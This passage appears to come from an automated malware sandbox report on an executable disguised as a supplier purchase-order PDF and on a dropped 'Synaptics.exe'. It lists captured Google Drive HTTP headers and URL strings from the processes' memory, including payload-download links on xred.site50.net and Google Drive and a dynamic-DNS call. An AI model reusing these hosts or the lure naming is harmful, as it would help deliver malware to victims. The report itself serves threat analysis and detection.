                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4lrNtNmMrZFu1nW6CgRsnm3e08VyybeC672SKzCK1KSl_xQof1OvMDAN9c45jbzoSKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:51 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-GhGD48duzjwWq0iHhpvSjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4d92cJFdJiVNa9eFSZfKv7P6lnDXO2BYw7OmGT1S3ie9_IqHopdM1CkgH66KCyI10n-8hNfJ0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:51 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZC-wFo_hQk4T4hNQ4pBcVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78_eg5XewAkuh3xck0WBShnNvQxtkSfqlnfZl19gkkD4nqOC-5vGn5r_DuaHeIja9YWIlK9wQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:52 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zSvyTcHj0D2JUch8206yEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4oY-GARncQEDZ0cQsqEoc_K2TW44oOfLJAeJQFdJUUUMNON3kQKfblRU08_YkDXavKap0qP64Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:53 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VsqyH0TSWQkn3H0OQGuqlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6sXiif5GL6JjzU04Yp6gARQa5-yIxMq3l4odgVdA9uNTxAL52wtHHDyjd7Odi89lVBhmj_9XIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:55 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-hosNYiIhRYXnivuXG93jxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4aTYrtBO3tIK5UUqTTSEIdd_UNmZ-azqQVolpSNPrzBheJjWsiy_n6qxMbkH-0F-hfContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:55 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ftZtmqNplQUJXpFMnoCf1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4bYkTwNeCxPGp_3BhGc8ZU7DOExsdp1IJnRu92qe5Km7VW2QoWcDgcjCxUbhqLjseFfQwBzuYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:56 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-u_yJCVKGR0Bue4MeWV9Jxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78R_9SfpG1mtwdjUV-eg6feTIyisWy8tOGMQcE0WvK7eWQIg9JmQABwCfbf-EGA4t2Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:56 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-88wrk4mwz5woJIo30CSorw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7uckmJjbG6pRoIoO_DqJ8hSCNpSPlSVaQFTN34_8IZ47cqTHEM5AVE7cl13xdn0i_1_eZi-c0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:58 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-CeNAxE4kT95s6BSGXV5iAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7fnboO1oysK1SxL2f-Ld-ah3ZxOll19V2MNkCwIEoTBvbEQOP7MVLMnonkpGdQLaOqContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:59 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-RAZRI47Ns8ojv8t7u_DTcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4QYR8TdrWc-hFbZ__t4OCTPKdJ6adOlF7lYCO3B-1EGA8P7SsY4303mVdAlmZdEa6EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:59 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xlT_aRDpGHQH9k4OvRktzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC56Cshp4Xul7Ybvx4uxkl591XhqgmeJIomstq5s3UE8uZKM3kIDKwq7KOQMuuWxlow0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:00 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-ZbZPziDJOT7AXu4ld74VwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: Synaptics.exe, 00000003.00000002.2645686279.00000000005FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: Synaptics.exe, 00000003.00000002.2645686279.00000000005FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629787
Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini0
Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.000000000060A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.00000000006AC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2688843389.000000000EFBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/Data
Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/ckground-size:100%
Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/google.com/
Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/google.com/S
Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/load?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000003.00000002.2694610616.000000001023E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2711091391.000000001968E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2699875581.0000000012D7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2668420509.000000000ACFE000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0;
Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.2653861362.0000000006DAE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2693179119.000000000F97E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2712821501.000000001ABCE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2713679874.000000001B34E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2710203910.0000000018B4E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2714252208.000000001B84E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2709697334.00000000188CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2700359770.000000001327E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2701045920.00000000138CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2702917525.00000000142CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2707229055.0000000016E8E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649194042.0000000004EDE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2664466381.0000000007EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2666978489.0000000009B7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2669872668.000000000BBFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2700830560.000000001364E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674839457.000000000E2BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2706218501.000000001648E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2704816233.000000001544E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2694444435.00000000100FE000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3xi
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4F
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4dp.pJ
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download52
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download54px;
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6Ga
                              Source: Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7Y
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7ZM
                              Source: Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7Zx
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7yu
